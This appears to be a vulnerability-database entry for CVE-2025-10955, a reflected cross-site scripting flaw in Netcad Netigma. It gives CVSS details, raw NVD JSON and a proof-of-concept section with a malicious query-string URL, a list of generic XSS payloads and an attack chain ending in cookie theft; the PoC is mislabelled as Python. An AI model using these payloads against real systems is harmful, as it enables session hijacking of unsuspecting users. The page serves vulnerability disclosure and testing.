Security Vulnerability Report
中文
CVE-2025-10955 CVSS 6.1 MEDIUM

CVE-2025-10955

Published: 2025-11-06 15:15:46
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Netcad Software Inc. Netigma allows XSS Through HTTP Query Strings.This issue affects Netigma: from 6.3.5 before 6.3.5 V8.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Netigma < 6.3.5
Netigma 6.3.5 before V8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-10955 PoC - XSS via HTTP Query String in Netigma // This PoC demonstrates how an attacker can inject malicious JavaScript through URL parameters // Example malicious URL: const maliciousUrl = 'https://target-netigma-server/Netigma?' + 'param=<script>alert(document.cookie)</script>'; // Alternative XSS payloads: const xssPayloads = [ '<script>alert(String.fromCharCode(88,83,83))</script>', '<img src=x onerror=alert(document.domain)>', '<svg onload=alert(document.cookie)>', '<iframe src="javascript:alert(\'XSS\')">', '<a href="javascript:alert(\'XSS\')">click me</a>', '<body onload=alert(\'XSS\')>', '<details open ontoggle=alert(\'XSS\')>', '<video><source onerror="alert(\'XSS\')">', '<audio src=x onerror=alert(\'XSS\')>', '<object data="javascript:alert(\'XSS\')">' ]; // Attack chain: // 1. Attacker crafts malicious URL with XSS payload in query parameter // 2. Attacker uses social engineering to trick victim into clicking the link // 3. Victim's browser sends request to Netigma server // 4. Server reflects unsanitized input in HTTP response // 5. Victim's browser executes malicious script in context of vulnerable site // 6. Attacker steals session cookies or performs actions on behalf of victim

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10955", "sourceIdentifier": "[email protected]", "published": "2025-11-06T15:15:45.717", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Netcad Software Inc. Netigma allows XSS Through HTTP Query Strings.This issue affects Netigma: from 6.3.5 before 6.3.5 V8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0378", "source": "[email protected]"}]}}